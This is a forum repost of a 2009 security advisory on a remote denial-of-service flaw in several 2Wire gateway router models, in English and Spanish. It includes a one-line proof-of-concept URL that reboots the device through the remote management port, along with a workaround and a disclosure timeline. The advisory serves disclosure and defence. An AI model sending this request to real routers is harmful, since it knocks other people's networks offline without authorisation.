Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts

2Wire Remote Denial Of Service

Started by qcred11 , Nov 09 2009 11:45 PM

Please log in to reply

No replies to this topic

#1 qcred11

First Sergeant

Members
2,544 posts

Posted 09 November 2009 - 11:45 PM


======================================== 

              2WIRE REMOTE DENIAL OF SERVICE 

        ======================================== 





Device:      2wire Gateway Router/Modem 

Vulnerable Software:   =< 5.29.52 

Vulnerable Models:   1700HG 

        1701HG 

        1800HW 

        2071 

        2700HG 

        2701HG-T 

Release Date:    2009-10-29 

Last Update:    2009-09 

Critical:    Moderately critical 

Impact:    Denial of service 

     Remote router reboot 

Where:      From remote 

     In the remote management interface 

Solution Status:   Vendor issued firmware patches 

        Providers are in charge of applying the patches 

WebVuln Advisory:   1-003 





 BACKGROUND 

======================= 



The remote management interface of some 2wire modems is enabled by 

default. 

This interface runs over SSL on port 50001 with an untrusted issuer 

certificate. 



++Espanol 

Algunos modems 2wire tienen la interfaz remota habilitada por default. 

La interfaz utiliza SSL con un certificado invalido en el puerto 50001. 





  DESCRIPTION 

======================= 



Some 2wire modems are vulnerable to a remote denial of service attack. 

By requesting a special url from the Remote Management interface, an 

unathenticated 

user can remotely reboot the complete device. 



++ 

Algunos modems 2wire son vulnerables a un ataque de denegacion de 

servicio. 

Un usuario no autenticado puede reiniciar el dispositivo enviando una 

peticion a 

la interfaz de Administracion remota. 





 EXPLOIT / POC 

======================= 



https://<remoteIP>:50001/xslt?page=%0d%0a 





 WORKAROUND 

======================= 



Disable Remote Management in Firewall -> Advanced Settings. 



++ 

Deshabilitar Administracion remota en Cortafuegos -> Configuracion 

avanzada 





  DISCLOSURE TIMELINE 

======================= 



2009/09/06 - Vulnerability discovered 

2009/09/08 - Vendor contacted 





                 ======================= 



                          h k m 

                       hkm@hakim.ws